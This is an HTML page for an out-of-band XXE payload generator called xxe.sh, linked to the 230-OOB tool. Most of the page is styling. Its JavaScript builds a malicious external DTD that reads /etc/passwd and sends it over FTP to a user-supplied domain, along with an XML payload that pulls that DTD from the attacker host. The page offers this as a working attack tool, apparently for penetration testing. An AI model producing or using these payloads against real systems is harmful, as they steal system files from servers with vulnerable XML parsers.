<html>
<head>
<link href="https://fonts.googleapis.com/css?family=Share|Open+Sans" rel="stylesheet">
<title>xxe.sh || OOB XXE tool</title>
<style>
body{
	margin:0;
	padding:0;
        background: #2980b9 url('https://static.tumblr.com/03fbbc566b081016810402488936fbae/pqpk3dn/MRSmlzpj3/tumblr_static_bg3.png') repeat 0 0;
	-webkit-animation: 10s linear 0s normal none infinite animate;
	-moz-animation: 10s linear 0s normal none infinite animate;
	-ms-animation: 10s linear 0s normal none infinite animate;
	-o-animation: 10s linear 0s normal none infinite animate;
	animation: 10s linear 0s normal none infinite animate;

}

@-webkit-keyframes animate {
	from {background-position:0 0;}
	to {background-position: 500px 0;}
}

@-moz-keyframes animate {
	from {background-position:0 0;}
	to {background-position: 500px 0;}
}

@-ms-keyframes animate {
	from {background-position:0 0;}
	to {background-position: 500px 0;}
}

@-o-keyframes animate {
	from {background-position:0 0;}
	to {background-position: 500px 0;}
}

@keyframes animate {
	from {background-position:0 0;}
	to {background-position: 500px 0;}
}
textarea {
  width: 600px;
  height: 100px;
  -moz-border-bottom-colors: none;
  -moz-border-left-colors: none;
  -moz-border-right-colors: none;
  -moz-border-top-colors: none;
  background: none repeat scroll 0 0 #B3B3B3;
  border-color: -moz-use-text-color #FFFFFF #FFFFFF -moz-use-text-color;
  border-image: none;
  border-radius: 6px 6px 6px 6px;
  border-style: none none none none;
  border-width: medium 1px 1px medium;
  box-shadow: 0 1px 2px rgba(0, 0, 0, 0.12) inset;
  color: black;
  font-family: "Open Sans";
  font-size: 1em;
  line-height: 1.4em;
  padding: 5px 8px;
  transition: background-color 0.2s ease 0s;
}
input {
  font-family:'Open Sans';
  border-radius: 5px;
  border:none;
  height: 25px;
  width: 200px;
  padding-left:5px;
  box-shadow: -2px 3px #929292;

}
h3 {
  font-family:'Share';
  color:orange;
}
h2 {
  font-family:'Share';
  color:#13E921;
}
button {
  border:none;
  border-radius: 5px;
  box-shadow: -1px 2px red;
  font-family:'Share';
  font-size:20px;
  color:#06E619;
}
a {
  text-decoration:none;
  color: red;
}
a:visited {
  color:red;
  text-decoration:none;
}
</style>
</head>
<body>
<div align="center">
<img align="center" src="https://github.com/sxcurity/230-OOB/raw/master/logo.png" width="800">
<h2>Use with <a href="https://github.com/sxcurity/230-OOB" target="_blank">230-OOB</a></h2>
<h3>Domain:</h3><input type="text" id="xxeDomain" value="xxe.sh">
<br><br>
<button onclick="generate()">GO!</button>
<br><br>
<h3>xxe.dtd</h3>
<textarea id="XXEdtd">
</textarea>
<br>
<h3>payload:</h3>
<textarea id="xxePayload">
</textarea>
<br><br>
<script>
function generate() {
	var xxeDomain = document.getElementById("xxeDomain").value;
	var xxeDTD = '<!ENTITY % d SYSTEM "file:///etc/passwd">\n<!ENTITY % c "<!ENTITY rrr SYSTEM \'ftp://'+xxeDomain+':2121/%d;\'>"> ';
        document.getElementById("XXEdtd").innerHTML = xxeDTD;
	var xxePayload = '<?xml version="1.0"?>\n<!DOCTYPE cdl [<!ENTITY % asd SYSTEM "http://'+xxeDomain+'/xxe.dtd">%asd;%c;]>\n<cdl>&rrr;</cdl>'
	document.getElementById("xxePayload").innerHTML = xxePayload;
}
</script>
</div>
</body>
</html>
